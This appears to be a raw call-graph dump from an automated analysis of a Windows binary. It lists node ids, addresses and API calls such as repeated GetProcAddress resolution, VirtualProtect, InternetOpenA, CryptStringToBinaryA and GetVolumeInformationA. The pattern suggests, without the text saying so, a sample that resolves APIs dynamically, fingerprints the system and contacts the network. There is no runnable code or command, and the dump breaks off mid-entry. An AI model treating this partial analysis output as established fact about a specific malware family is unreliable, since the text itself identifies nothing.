d463ca 36663->36668 36669 d31590 lstrcpy 36663->36669 37699 d44300 57 API calls 2 library calls 36664->37699 37701 d449d0 88 API calls codecvt 36665->37701 36672 d463a0 36666->36672 36670 d463ef 36668->36670 36675 d31590 lstrcpy 36668->36675 36674 d463c5 36669->36674 36676 d46414 36670->36676 36682 d31590 lstrcpy 36670->36682 37702 d44e00 61 API calls codecvt 36672->37702 36673 d4633c 36678 d31590 lstrcpy 36673->36678 37703 d44fc0 65 API calls 36674->37703 36681 d463ea 36675->36681 36679 d46439 36676->36679 36685 d31590 lstrcpy 36676->36685 36683 d46356 36678->36683 36686 d46460 36679->36686 36690 d31590 lstrcpy 36679->36690 37704 d45190 63 API calls codecvt 36681->37704 36688 d4640f 36682->36688 37700 d45350 43 API calls 36683->37700 36689 d46434 36685->36689 36691 d46470 36686->36691 36692 d46503 36686->36692 37705 d37770 106 API calls codecvt 36688->37705 37706 d452a0 61 API calls codecvt 36689->37706 36695 d46459 36690->36695 36697 d4aa50 lstrcpy 36691->36697 36696 d4aab0 lstrcpy 36692->36696 37707 d491a0 46 API calls codecvt 36695->37707 36699 d46516 36696->36699 36700 d46491 36697->36700 36702 d31590 lstrcpy 36699->36702 36701 d31590 lstrcpy 36700->36701 36703 d464a5 36701->36703 36704 d4652a 36702->36704 37708 d359b0 34 API calls codecvt 36703->37708 37711 d359b0 34 API calls codecvt 36704->37711 36707 d46530 37712 d437b0 31 API calls 36707->37712 36708 d464ab 37709 d41520 19 API calls codecvt 36708->37709 36711 d464fb 36714 d4aab0 lstrcpy 36711->36714 36712 d464b6 36713 d31590 lstrcpy 36712->36713 36715 d464f6 36713->36715 36716 d4654c 36714->36716 37710 d44010 67 API calls 36715->37710 36718 d31590 lstrcpy 36716->36718 36719 d46560 36718->36719 37713 d359b0 34 API calls codecvt 36719->37713 36721 d4656c 36723 d46588 36721->36723 37714 d468d0 9 API calls codecvt 36721->37714 36723->36369 36725 d34621 RtlAllocateHeap 36724->36725 36728 d34671 VirtualProtect 36725->36728 36728->36373 36729->36460 36732 d310c2 codecvt 36730->36732 36731 d310fd 36731->36490 36732->36731 36733 d310e2 VirtualFree 36732->36733 36733->36731 36735 d31233 GlobalMemoryStatusEx 36734->36735 36735->36493 36736->36517 36738 d4aad2 36737->36738 36739 d4aafc 36738->36739 36740 d4aaea lstrcpy 36738->36740 36739->36522 36740->36739 36742 d4aa50 lstrcpy 36741->36742 36743 d46ad3 36742->36743 36744 d4acc0 4 API calls 36743->36744 36745 d46ae5 36744->36745 36746 d4abb0 lstrcpy 36745->36746 36747 d46aee 36746->36747 36748 d4acc0 4 API calls 36747->36748 36749 d46b07 36748->36749 36750 d4abb0 lstrcpy 36749->36750 36751 d46b10 36750->36751 36752 d4acc0 4 API calls 36751->36752 36753 d46b2a 36752->36753 36754 d4abb0 lstrcpy 36753->36754 36755 d46b33 36754->36755 36756 d4acc0 4 API calls 36755->36756 36757 d46b4c 36756->36757 36758 d4abb0 lstrcpy 36757->36758 36759 d46b55 36758->36759 36760 d4acc0 4 API calls 36759->36760 36761 d46b6f 36760->36761 36762 d4abb0 lstrcpy 36761->36762 36763 d46b78 36762->36763 36764 d4acc0 4 API calls 36763->36764 36765 d46b93 36764->36765 36766 d4abb0 lstrcpy 36765->36766 36767 d46b9c 36766->36767 36768 d4aab0 lstrcpy 36767->36768 36769 d46bb0 36768->36769 36769->36529 36771 d4ab22 36770->36771 36771->36532 36773 d4ab4f 36772->36773 36774 d45da4 36773->36774 36775 d4ab8b lstrcpy 36773->36775 36774->36542 36775->36774 36777 d4abb0 lstrcpy 36776->36777 36778 d46693 36777->36778 36779 d4abb0 lstrcpy 36778->36779 36780 d466a5 36779->36780 36781 d4abb0 lstrcpy 36780->36781 36782 d466b7 36781->36782 36783 d4abb0 lstrcpy 36782->36783 36784 d45dd6 36783->36784 36784->36548 36786 d34610 2 API calls 36785->36786 36787 d32704 36786->36787 36788 d34610 2 API calls 36787->36788 36789 d32727 36788->36789 36790 d34610 2 API calls 36789->36790 36791 d32740 36790->36791 36792 d34610 2 API calls 36791->36792 36793 d32759 36792->36793 36794 d34610 2 API calls 36793->36794 36795 d32786 36794->36795 36796 d34610 2 API calls 36795->36796 36797 d3279f 36796->36797 36798 d34610 2 API calls 36797->36798 36799 d327b8 36798->36799 36800 d34610 2 API calls 36799->36800 36801 d327e5 36800->36801 36802 d34610 2 API calls 36801->36802 36803 d327fe 36802->36803 36804 d34610 2 API calls 36803->36804 36805 d32817 36804->36805 36806 d34610 2 API calls 36805->36806 36807 d32830 36806->36807 36808 d34610 2 API calls 36807->36808 36809 d32849 36808->36809 36810 d34610 2 API calls 36809->36810 36811 d32862 36810->36811 36812 d34610 2 API calls 36811->36812 36813 d3287b 36812->36813 36814 d34610 2 API calls 36813->36814 36815 d32894 36814->36815 36816 d34610 2 API calls 36815->36816 36817 d328ad 36816->36817 36818 d34610 2 API calls 36817->36818 36819 d328c6 36818->36819 36820 d34610 2 API calls 36819->36820 36821 d328df 36820->36821 36822 d34610 2 API calls 36821->36822 36823 d328f8 36822->36823 36824 d34610 2 API calls 36823->36824 36825 d32911 36824->36825 36826 d34610 2 API calls 36825->36826 36827 d3292a 36826->36827 36828 d34610 2 API calls 36827->36828 36829 d32943 36828->36829 36830 d34610 2 API calls 36829->36830 36831 d3295c 36830->36831 36832 d34610 2 API calls 36831->36832 36833 d32975 36832->36833 36834 d34610 2 API calls 36833->36834 36835 d3298e 36834->36835 36836 d34610 2 API calls 36835->36836 36837 d329a7 36836->36837 36838 d34610 2 API calls 36837->36838 36839 d329c0 36838->36839 36840 d34610 2 API calls 36839->36840 36841 d329d9 36840->36841 36842 d34610 2 API calls 36841->36842 36843 d329f2 36842->36843 36844 d34610 2 API calls 36843->36844 36845 d32a0b 36844->36845 36846 d34610 2 API calls 36845->36846 36847 d32a24 36846->36847 36848 d34610 2 API calls 36847->36848 36849 d32a3d 36848->36849 36850 d34610 2 API calls 36849->36850 36851 d32a56 36850->36851 36852 d34610 2 API calls 36851->36852 36853 d32a6f 36852->36853 36854 d34610 2 API calls 36853->36854 36855 d32a88 36854->36855 36856 d34610 2 API calls 36855->36856 36857 d32aa1 36856->36857 36858 d34610 2 API calls 36857->36858 36859 d32aba 36858->36859 36860 d34610 2 API calls 36859->36860 36861 d32ad3 36860->36861 36862 d34610 2 API calls 36861->36862 36863 d32aec 36862->36863 36864 d34610 2 API calls 36863->36864 36865 d32b05 36864->36865 36866 d34610 2 API calls 36865->36866 36867 d32b1e 36866->36867 36868 d34610 2 API calls 36867->36868 36869 d32b37 36868->36869 36870 d34610 2 API calls 36869->36870 36871 d32b50 36870->36871 36872 d34610 2 API calls 36871->36872 36873 d32b69 36872->36873 36874 d34610 2 API calls 36873->36874 36875 d32b82 36874->36875 36876 d34610 2 API calls 36875->36876 36877 d32b9b 36876->36877 36878 d34610 2 API calls 36877->36878 36879 d32bb4 36878->36879 36880 d34610 2 API calls 36879->36880 36881 d32bcd 36880->36881 36882 d34610 2 API calls 36881->36882 36883 d32be6 36882->36883 36884 d34610 2 API calls 36883->36884 36885 d32bff 36884->36885 36886 d34610 2 API calls 36885->36886 36887 d32c18 36886->36887 36888 d34610 2 API calls 36887->36888 36889 d32c31 36888->36889 36890 d34610 2 API calls 36889->36890 36891 d32c4a 36890->36891 36892 d34610 2 API calls 36891->36892 36893 d32c63 36892->36893 36894 d34610 2 API calls 36893->36894 36895 d32c7c 36894->36895 36896 d34610 2 API calls 36895->36896 36897 d32c95 36896->36897 36898 d34610 2 API calls 36897->36898 36899 d32cae 36898->36899 36900 d34610 2 API calls 36899->36900 36901 d32cc7 36900->36901 36902 d34610 2 API calls 36901->36902 36903 d32ce0 36902->36903 36904 d34610 2 API calls 36903->36904 36905 d32cf9 36904->36905 36906 d34610 2 API calls 36905->36906 36907 d32d12 36906->36907 36908 d34610 2 API calls 36907->36908 36909 d32d2b 36908->36909 36910 d34610 2 API calls 36909->36910 36911 d32d44 36910->36911 36912 d34610 2 API calls 36911->36912 36913 d32d5d 36912->36913 36914 d34610 2 API calls 36913->36914 36915 d32d76 36914->36915 36916 d34610 2 API calls 36915->36916 36917 d32d8f 36916->36917 36918 d34610 2 API calls 36917->36918 36919 d32da8 36918->36919 36920 d34610 2 API calls 36919->36920 36921 d32dc1 36920->36921 36922 d34610 2 API calls 36921->36922 36923 d32dda 36922->36923 36924 d34610 2 API calls 36923->36924 36925 d32df3 36924->36925 36926 d34610 2 API calls 36925->36926 36927 d32e0c 36926->36927 36928 d34610 2 API calls 36927->36928 36929 d32e25 36928->36929 36930 d34610 2 API calls 36929->36930 36931 d32e3e 36930->36931 36932 d34610 2 API calls 36931->36932 36933 d32e57 36932->36933 36934 d34610 2 API calls 36933->36934 36935 d32e70 36934->36935 36936 d34610 2 API calls 36935->36936 36937 d32e89 36936->36937 36938 d34610 2 API calls 36937->36938 36939 d32ea2 36938->36939 36940 d34610 2 API calls 36939->36940 36941 d32ebb 36940->36941 36942 d34610 2 API calls 36941->36942 36943 d32ed4 36942->36943 36944 d34610 2 API calls 36943->36944 36945 d32eed 36944->36945 36946 d34610 2 API calls 36945->36946 36947 d32f06 36946->36947 36948 d34610 2 API calls 36947->36948 36949 d32f1f 36948->36949 36950 d34610 2 API calls 36949->36950 36951 d32f38 36950->36951 36952 d34610 2 API calls 36951->36952 36953 d32f51 36952->36953 36954 d34610 2 API calls 36953->36954 36955 d32f6a 36954->36955 36956 d34610 2 API calls 36955->36956 36957 d32f83 36956->36957 36958 d34610 2 API calls 36957->36958 36959 d32f9c 36958->36959 36960 d34610 2 API calls 36959->36960 36961 d32fb5 36960->36961 36962 d34610 2 API calls 36961->36962 36963 d32fce 36962->36963 36964 d34610 2 API calls 36963->36964 36965 d32fe7 36964->36965 36966 d34610 2 API calls 36965->36966 36967 d33000 36966->36967 36968 d34610 2 API calls 36967->36968 36969 d33019 36968->36969 36970 d34610 2 API calls 36969->36970 36971 d33032 36970->36971 36972 d34610 2 API calls 36971->36972 36973 d3304b 36972->36973 36974 d34610 2 API calls 36973->36974 36975 d33064 36974->36975 36976 d34610 2 API calls 36975->36976 36977 d3307d 36976->36977 36978 d34610 2 API calls 36977->36978 36979 d33096 36978->36979 36980 d34610 2 API calls 36979->36980 36981 d330af 36980->36981 36982 d34610 2 API calls 36981->36982 36983 d330c8 36982->36983 36984 d34610 2 API calls 36983->36984 36985 d330e1 36984->36985 36986 d34610 2 API calls 36985->36986 36987 d330fa 36986->36987 36988 d34610 2 API calls 36987->36988 36989 d33113 36988->36989 36990 d34610 2 API calls 36989->36990 36991 d3312c 36990->36991 36992 d34610 2 API calls 36991->36992 36993 d33145 36992->36993 36994 d34610 2 API calls 36993->36994 36995 d3315e 36994->36995 36996 d34610 2 API calls 36995->36996 36997 d33177 36996->36997 36998 d34610 2 API calls 36997->36998 36999 d33190 36998->36999 37000 d34610 2 API calls 36999->37000 37001 d331a9 37000->37001 37002 d34610 2 API calls 37001->37002 37003 d331c2 37002->37003 37004 d34610 2 API calls 37003->37004 37005 d331db 37004->37005 37006 d34610 2 API calls 37005->37006 37007 d331f4 37006->37007 37008 d34610 2 API calls 37007->37008 37009 d3320d 37008->37009 37010 d34610 2 API calls 37009->37010 37011 d33226 37010->37011 37012 d34610 2 API calls 37011->37012 37013 d3323f 37012->37013 37014 d34610 2 API calls 37013->37014 37015 d33258 37014->37015 37016 d34610 2 API calls 37015->37016 37017 d33271 37016->37017 37018 d34610 2 API calls 37017->37018 37019 d3328a 37018->37019 37020 d34610 2 API calls 37019->37020 37021 d332a3 37020->37021 37022 d34610 2 API calls 37021->37022 37023 d332bc 37022->37023 37024 d34610 2 API calls 37023->37024 37025 d332d5 37024->37025 37026 d34610 2 API calls 37025->37026 37027 d332ee 37026->37027 37028 d34610 2 API calls 37027->37028 37029 d33307 37028->37029 37030 d34610 2 API calls 37029->37030 37031 d33320 37030->37031 37032 d34610 2 API calls 37031->37032 37033 d33339 37032->37033 37034 d34610 2 API calls 37033->37034 37035 d33352 37034->37035 37036 d34610 2 API calls 37035->37036 37037 d3336b 37036->37037 37038 d34610 2 API calls 37037->37038 37039 d33384 37038->37039 37040 d34610 2 API calls 37039->37040 37041 d3339d 37040->37041 37042 d34610 2 API calls 37041->37042 37043 d333b6 37042->37043 37044 d34610 2 API calls 37043->37044 37045 d333cf 37044->37045 37046 d34610 2 API calls 37045->37046 37047 d333e8 37046->37047 37048 d34610 2 API calls 37047->37048 37049 d33401 37048->37049 37050 d34610 2 API calls 37049->37050 37051 d3341a 37050->37051 37052 d34610 2 API calls 37051->37052 37053 d33433 37052->37053 37054 d34610 2 API calls 37053->37054 37055 d3344c 37054->37055 37056 d34610 2 API calls 37055->37056 37057 d33465 37056->37057 37058 d34610 2 API calls 37057->37058 37059 d3347e 37058->37059 37060 d34610 2 API calls 37059->37060 37061 d33497 37060->37061 37062 d34610 2 API calls 37061->37062 37063 d334b0 37062->37063 37064 d34610 2 API calls 37063->37064 37065 d334c9 37064->37065 37066 d34610 2 API calls 37065->37066 37067 d334e2 37066->37067 37068 d34610 2 API calls 37067->37068 37069 d334fb 37068->37069 37070 d34610 2 API calls 37069->37070 37071 d33514 37070->37071 37072 d34610 2 API calls 37071->37072 37073 d3352d 37072->37073 37074 d34610 2 API calls 37073->37074 37075 d33546 37074->37075 37076 d34610 2 API calls 37075->37076 37077 d3355f 37076->37077 37078 d34610 2 API calls 37077->37078 37079 d33578 37078->37079 37080 d34610 2 API calls 37079->37080 37081 d33591 37080->37081 37082 d34610 2 API calls 37081->37082 37083 d335aa 37082->37083 37084 d34610 2 API calls 37083->37084 37085 d335c3 37084->37085 37086 d34610 2 API calls 37085->37086 37087 d335dc 37086->37087 37088 d34610 2 API calls 37087->37088 37089 d335f5 37088->37089 37090 d34610 2 API calls 37089->37090 37091 d3360e 37090->37091 37092 d34610 2 API calls 37091->37092 37093 d33627 37092->37093 37094 d34610 2 API calls 37093->37094 37095 d33640 37094->37095 37096 d34610 2 API calls 37095->37096 37097 d33659 37096->37097 37098 d34610 2 API calls 37097->37098 37099 d33672 37098->37099 37100 d34610 2 API calls 37099->37100 37101 d3368b 37100->37101 37102 d34610 2 API calls 37101->37102 37103 d336a4 37102->37103 37104 d34610 2 API calls 37103->37104 37105 d336bd 37104->37105 37106 d34610 2 API calls 37105->37106 37107 d336d6 37106->37107 37108 d34610 2 API calls 37107->37108 37109 d336ef 37108->37109 37110 d34610 2 API calls 37109->37110 37111 d33708 37110->37111 37112 d34610 2 API calls 37111->37112 37113 d33721 37112->37113 37114 d34610 2 API calls 37113->37114 37115 d3373a 37114->37115 37116 d34610 2 API calls 37115->37116 37117 d33753 37116->37117 37118 d34610 2 API calls 37117->37118 37119 d3376c 37118->37119 37120 d34610 2 API calls 37119->37120 37121 d33785 37120->37121 37122 d34610 2 API calls 37121->37122 37123 d3379e 37122->37123 37124 d34610 2 API calls 37123->37124 37125 d337b7 37124->37125 37126 d34610 2 API calls 37125->37126 37127 d337d0 37126->37127 37128 d34610 2 API calls 37127->37128 37129 d337e9 37128->37129 37130 d34610 2 API calls 37129->37130 37131 d33802 37130->37131 37132 d34610 2 API calls 37131->37132 37133 d3381b 37132->37133 37134 d34610 2 API calls 37133->37134 37135 d33834 37134->37135 37136 d34610 2 API calls 37135->37136 37137 d3384d 37136->37137 37138 d34610 2 API calls 37137->37138 37139 d33866 37138->37139 37140 d34610 2 API calls 37139->37140 37141 d3387f 37140->37141 37142 d34610 2 API calls 37141->37142 37143 d33898 37142->37143 37144 d34610 2 API calls 37143->37144 37145 d338b1 37144->37145 37146 d34610 2 API calls 37145->37146 37147 d338ca 37146->37147 37148 d34610 2 API calls 37147->37148 37149 d338e3 37148->37149 37150 d34610 2 API calls 37149->37150 37151 d338fc 37150->37151 37152 d34610 2 API calls 37151->37152 37153 d33915 37152->37153 37154 d34610 2 API calls 37153->37154 37155 d3392e 37154->37155 37156 d34610 2 API calls 37155->37156 37157 d33947 37156->37157 37158 d34610 2 API calls 37157->37158 37159 d33960 37158->37159 37160 d34610 2 API calls 37159->37160 37161 d33979 37160->37161 37162 d34610 2 API calls 37161->37162 37163 d33992 37162->37163 37164 d34610 2 API calls 37163->37164 37165 d339ab 37164->37165 37166 d34610 2 API calls 37165->37166 37167 d339c4 37166->37167 37168 d34610 2 API calls 37167->37168 37169 d339dd 37168->37169 37170 d34610 2 API calls 37169->37170 37171 d339f6 37170->37171 37172 d34610 2 API calls 37171->37172 37173 d33a0f 37172->37173 37174 d34610 2 API calls 37173->37174 37175 d33a28 37174->37175 37176 d34610 2 API calls 37175->37176 37177 d33a41 37176->37177 37178 d34610 2 API calls 37177->37178 37179 d33a5a 37178->37179 37180 d34610 2 API calls 37179->37180 37181 d33a73 37180->37181 37182 d34610 2 API calls 37181->37182 37183 d33a8c 37182->37183 37184 d34610 2 API calls 37183->37184 37185 d33aa5 37184->37185 37186 d34610 2 API calls 37185->37186 37187 d33abe 37186->37187 37188 d34610 2 API calls 37187->37188 37189 d33ad7 37188->37189 37190 d34610 2 API calls 37189->37190 37191 d33af0 37190->37191 37192 d34610 2 API calls 37191->37192 37193 d33b09 37192->37193 37194 d34610 2 API calls 37193->37194 37195 d33b22 37194->37195 37196 d34610 2 API calls 37195->37196 37197 d33b3b 37196->37197 37198 d34610 2 API calls 37197->37198 37199 d33b54 37198->37199 37200 d34610 2 API calls 37199->37200 37201 d33b6d 37200->37201 37202 d34610 2 API calls 37201->37202 37203 d33b86 37202->37203 37204 d34610 2 API calls 37203->37204 37205 d33b9f 37204->37205 37206 d34610 2 API calls 37205->37206 37207 d33bb8 37206->37207 37208 d34610 2 API calls 37207->37208 37209 d33bd1 37208->37209 37210 d34610 2 API calls 37209->37210 37211 d33bea 37210->37211 37212 d34610 2 API calls 37211->37212 37213 d33c03 37212->37213 37214 d34610 2 API calls 37213->37214 37215 d33c1c 37214->37215 37216 d34610 2 API calls 37215->37216 37217 d33c35 37216->37217 37218 d34610 2 API calls 37217->37218 37219 d33c4e 37218->37219 37220 d34610 2 API calls 37219->37220 37221 d33c67 37220->37221 37222 d34610 2 API calls 37221->37222 37223 d33c80 37222->37223 37224 d34610 2 API calls 37223->37224 37225 d33c99 37224->37225 37226 d34610 2 API calls 37225->37226 37227 d33cb2 37226->37227 37228 d34610 2 API calls 37227->37228 37229 d33ccb 37228->37229 37230 d34610 2 API calls 37229->37230 37231 d33ce4 37230->37231 37232 d34610 2 API calls 37231->37232 37233 d33cfd 37232->37233 37234 d34610 2 API calls 37233->37234 37235 d33d16 37234->37235 37236 d34610 2 API calls 37235->37236 37237 d33d2f 37236->37237 37238 d34610 2 API calls 37237->37238 37239 d33d48 37238->37239 37240 d34610 2 API calls 37239->37240 37241 d33d61 37240->37241 37242 d34610 2 API calls 37241->37242 37243 d33d7a 37242->37243 37244 d34610 2 API calls 37243->37244 37245 d33d93 37244->37245 37246 d34610 2 API calls 37245->37246 37247 d33dac 37246->37247 37248 d34610 2 API calls 37247->37248 37249 d33dc5 37248->37249 37250 d34610 2 API calls 37249->37250 37251 d33dde 37250->37251 37252 d34610 2 API calls 37251->37252 37253 d33df7 37252->37253 37254 d34610 2 API calls 37253->37254 37255 d33e10 37254->37255 37256 d34610 2 API calls 37255->37256 37257 d33e29 37256->37257 37258 d34610 2 API calls 37257->37258 37259 d33e42 37258->37259 37260 d34610 2 API calls 37259->37260 37261 d33e5b 37260->37261 37262 d34610 2 API calls 37261->37262 37263 d33e74 37262->37263 37264 d34610 2 API calls 37263->37264 37265 d33e8d 37264->37265 37266 d34610 2 API calls 37265->37266 37267 d33ea6 37266->37267 37268 d34610 2 API calls 37267->37268 37269 d33ebf 37268->37269 37270 d34610 2 API calls 37269->37270 37271 d33ed8 37270->37271 37272 d34610 2 API calls 37271->37272 37273 d33ef1 37272->37273 37274 d34610 2 API calls 37273->37274 37275 d33f0a 37274->37275 37276 d34610 2 API calls 37275->37276 37277 d33f23 37276->37277 37278 d34610 2 API calls 37277->37278 37279 d33f3c 37278->37279 37280 d34610 2 API calls 37279->37280 37281 d33f55 37280->37281 37282 d34610 2 API calls 37281->37282 37283 d33f6e 37282->37283 37284 d34610 2 API calls 37283->37284 37285 d33f87 37284->37285 37286 d34610 2 API calls 37285->37286 37287 d33fa0 37286->37287 37288 d34610 2 API calls 37287->37288 37289 d33fb9 37288->37289 37290 d34610 2 API calls 37289->37290 37291 d33fd2 37290->37291 37292 d34610 2 API calls 37291->37292 37293 d33feb 37292->37293 37294 d34610 2 API calls 37293->37294 37295 d34004 37294->37295 37296 d34610 2 API calls 37295->37296 37297 d3401d 37296->37297 37298 d34610 2 API calls 37297->37298 37299 d34036 37298->37299 37300 d34610 2 API calls 37299->37300 37301 d3404f 37300->37301 37302 d34610 2 API calls 37301->37302 37303 d34068 37302->37303 37304 d34610 2 API calls 37303->37304 37305 d34081 37304->37305 37306 d34610 2 API calls 37305->37306 37307 d3409a 37306->37307 37308 d34610 2 API calls 37307->37308 37309 d340b3 37308->37309 37310 d34610 2 API calls 37309->37310 37311 d340cc 37310->37311 37312 d34610 2 API calls 37311->37312 37313 d340e5 37312->37313 37314 d34610 2 API calls 37313->37314 37315 d340fe 37314->37315 37316 d34610 2 API calls 37315->37316 37317 d34117 37316->37317 37318 d34610 2 API calls 37317->37318 37319 d34130 37318->37319 37320 d34610 2 API calls 37319->37320 37321 d34149 37320->37321 37322 d34610 2 API calls 37321->37322 37323 d34162 37322->37323 37324 d34610 2 API calls 37323->37324 37325 d3417b 37324->37325 37326 d34610 2 API calls 37325->37326 37327 d34194 37326->37327 37328 d34610 2 API calls 37327->37328 37329 d341ad 37328->37329 37330 d34610 2 API calls 37329->37330 37331 d341c6 37330->37331 37332 d34610 2 API calls 37331->37332 37333 d341df 37332->37333 37334 d34610 2 API calls 37333->37334 37335 d341f8 37334->37335 37336 d34610 2 API calls 37335->37336 37337 d34211 37336->37337 37338 d34610 2 API calls 37337->37338 37339 d3422a 37338->37339 37340 d34610 2 API calls 37339->37340 37341 d34243 37340->37341 37342 d34610 2 API calls 37341->37342 37343 d3425c 37342->37343 37344 d34610 2 API calls 37343->37344 37345 d34275 37344->37345 37346 d34610 2 API calls 37345->37346 37347 d3428e 37346->37347 37348 d34610 2 API calls 37347->37348 37349 d342a7 37348->37349 37350 d34610 2 API calls 37349->37350 37351 d342c0 37350->37351 37352 d34610 2 API calls 37351->37352 37353 d342d9 37352->37353 37354 d34610 2 API calls 37353->37354 37355 d342f2 37354->37355 37356 d34610 2 API calls 37355->37356 37357 d3430b 37356->37357 37358 d34610 2 API calls 37357->37358 37359 d34324 37358->37359 37360 d34610 2 API calls 37359->37360 37361 d3433d 37360->37361 37362 d34610 2 API calls 37361->37362 37363 d34356 37362->37363 37364 d34610 2 API calls 37363->37364 37365 d3436f 37364->37365 37366 d34610 2 API calls 37365->37366 37367 d34388 37366->37367 37368 d34610 2 API calls 37367->37368 37369 d343a1 37368->37369 37370 d34610 2 API calls 37369->37370 37371 d343ba 37370->37371 37372 d34610 2 API calls 37371->37372 37373 d343d3 37372->37373 37374 d34610 2 API calls 37373->37374 37375 d343ec 37374->37375 37376 d34610 2 API calls 37375->37376 37377 d34405 37376->37377 37378 d34610 2 API calls 37377->37378 37379 d3441e 37378->37379 37380 d34610 2 API calls 37379->37380 37381 d34437 37380->37381 37382 d34610 2 API calls 37381->37382 37383 d34450 37382->37383 37384 d34610 2 API calls 37383->37384 37385 d34469 37384->37385 37386 d34610 2 API calls 37385->37386 37387 d34482 37386->37387 37388 d34610 2 API calls 37387->37388 37389 d3449b 37388->37389 37390 d34610 2 API calls 37389->37390 37391 d344b4 37390->37391 37392 d34610 2 API calls 37391->37392 37393 d344cd 37392->37393 37394 d34610 2 API calls 37393->37394 37395 d344e6 37394->37395 37396 d34610 2 API calls 37395->37396 37397 d344ff 37396->37397 37398 d34610 2 API calls 37397->37398 37399 d34518 37398->37399 37400 d34610 2 API calls 37399->37400 37401 d34531 37400->37401 37402 d34610 2 API calls 37401->37402 37403 d3454a 37402->37403 37404 d34610 2 API calls 37403->37404 37405 d34563 37404->37405 37406 d34610 2 API calls 37405->37406 37407 d3457c 37406->37407 37408 d34610 2 API calls 37407->37408 37409 d34595 37408->37409 37410 d34610 2 API calls 37409->37410 37411 d345ae 37410->37411 37412 d34610 2 API calls 37411->37412 37413 d345c7 37412->37413 37414 d34610 2 API calls 37413->37414 37415 d345e0 37414->37415 37416 d34610 2 API calls 37415->37416 37417 d345f9 37416->37417 37418 d49f20 37417->37418 37419 d4a346 8 API calls 37418->37419 37420 d49f30 43 API calls 37418->37420 37421 d4a456 37419->37421 37422 d4a3dc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37419->37422 37420->37419 37423 d4a526 37421->37423 37424 d4a463 8 API calls 37421->37424 37422->37421 37425 d4a52f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37423->37425 37426 d4a5a8 37423->37426 37424->37423 37425->37426 37427 d4a5b5 6 API calls 37426->37427 37428 d4a647 37426->37428 37427->37428 37429 d4a654 9 API calls 37428->37429 37430 d4a72f 37428->37430 37429->37430 37431 d4a7b2 37430->37431 37432 d4a738 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37430->37432 37433 d4a7ec 37431->37433 37434 d4a7bb GetProcAddress GetProcAddress 37431->37434 37432->37431 37435 d4a825 37433->37435 37436 d4a7f5 GetProcAddress GetProcAddress 37433->37436 37434->37433 37437 d4a922 37435->37437 37438 d4a832 10 API calls 37435->37438 37436->37435 37439 d4a98d 37437->37439 37440 d4a92b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37437->37440 37438->37437 37441 d4a996 GetProcAddress 37439->37441 37442 d4a9ae 37439->37442 37440->37439 37441->37442 37443 d4a9b7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37442->37443 37444 d45ef3 37442->37444 37443->37444 37445 d31590 37444->37445 37715 d316b0 37445->37715 37448 d4aab0 lstrcpy 37449 d315b5 37448->37449 37450 d4aab0 lstrcpy 37449->37450 37451 d315c7 37450->37451 37452 d4aab0 lstrcpy 37451->37452 37453 d315d9 37452->37453 37454 d4aab0 lstrcpy 37453->37454 37455 d31663 37454->37455 37456 d45760 37455->37456 37457 d45771 37456->37457 37458 d4ab30 2 API calls 37457->37458 37459 d4577e 37458->37459 37460 d4ab30 2 API calls 37459->37460 37461 d4578b 37460->37461 37462 d4ab30 2 API calls 37461->37462 37463 d45798 37462->37463 37464 d4aa50 lstrcpy 37463->37464 37465 d457a5 37464->37465 37466 d4aa50 lstrcpy 37465->37466 37467 d457b2 37466->37467 37468 d4aa50 lstrcpy 37467->37468 37469 d457bf 37468->37469 37470 d4aa50 lstrcpy 37469->37470 37509 d457cc 37470->37509 37471 d31590 lstrcpy 37471->37509 37472 d45893 StrCmpCA 37472->37509 37473 d458f0 StrCmpCA 37474 d45a2c 37473->37474 37473->37509 37475 d4abb0 lstrcpy 37474->37475 37476 d45a38 37475->37476 37477 d4ab30 2 API calls 37476->37477 37479 d45a46 37477->37479 37478 d45aa6 StrCmpCA 37481 d45be1 37478->37481 37478->37509 37480 d4ab30 2 API calls 37479->37480 37483 d45a55 37480->37483 37484 d4abb0 lstrcpy 37481->37484 37482 d4aab0 lstrcpy 37482->37509 37485 d316b0 lstrcpy 37483->37485 37486 d45bed 37484->37486 37506 d45a61 37485->37506 37489 d4ab30 2 API calls 37486->37489 37487 d4aa50 lstrcpy 37487->37509 37488 d4ab30 lstrlen lstrcpy 37488->37509 37490 d45bfb 37489->37490 37492 d4ab30 2 API calls 37490->37492 37491 d45c5b StrCmpCA 37493 d45c66 Sleep 37491->37493 37494 d45c78 37491->37494 37495 d45c0a 37492->37495 37493->37509 37496 d4abb0 lstrcpy 37494->37496 37497 d316b0 lstrcpy 37495->37497 37498 d45c84 37496->37498 37497->37506 37499 d4ab30 2 API calls 37498->37499 37500 d45c93 37499->37500 37502 d4ab30 2 API calls 37500->37502 37501 d45510 25 API calls 37501->37509 37503 d45ca2 37502->37503 37505 d316b0 lstrcpy 37503->37505 37504 d459da StrCmpCA 37504->37509 37505->37506 37506->36563 37507 d45b8f StrCmpCA 37507->37509 37508 d45440 20 API calls 37508->37509 37509->37471 37509->37472 37509->37473 37509->37478 37509->37482 37509->37487 37509->37488 37509->37491 37509->37501 37509->37504 37509->37507 37509->37508 37510 d4abb0 lstrcpy 37509->37510 37510->37509 37512 d476e3 GetVolumeInformationA 37511->37512 37513 d476dc 37511->37513 37514 d47721 37512->37514 37513->37512 37515 d4778c GetProcessHeap RtlAllocateHeap 37514->37515 37516 d477b8 wsprintfA 37515->37516 37517 d477a9 37515->37517 37519 d4aa50 lstrcpy 37516->37519 37518 d4aa50 lstrcpy 37517->37518 37520 d45ff7 37518->37520 37519->37520 37520->36584 37522 d4aab0 lstrcpy 37521->37522 37523 d348e9 37522->37523 37724 d34800 37523->37724 37525 d348f5 37526 d4aa50 lstrcpy 37525->37526 37527 d34927 37526->37527 37528 d4aa50 lstrcpy 37527->37528 37529 d34934 37528->37529 37530 d4aa50 lstrcpy 37529->37530 37531 d34941 37530->37531 37532 d4aa50 lstrcpy 37531->37532 37533 d3494e 37532->37533 37534 d4aa50 lstrcpy 37533->37534 37535 d3495b InternetOpenA StrCmpCA 37534->37535 37536 d34994 37535->37536 37537 d34f1b InternetCloseHandle 37536->37537 37730 d48cf0 37536->37730 37539 d34f38 37537->37539 37745 d3a210 CryptStringToBinaryA 37539->37745 37540 d349b3 37738 d4ac30 37540->37738 37543 d349c6 37545 d4abb0 lstrcpy 37543->37545 37550 d349cf 37545->37550 37546 d4ab30 2 API calls 37547 d34f55 37546->37547 37549 d4acc0 4 API calls 37547->37549 37548 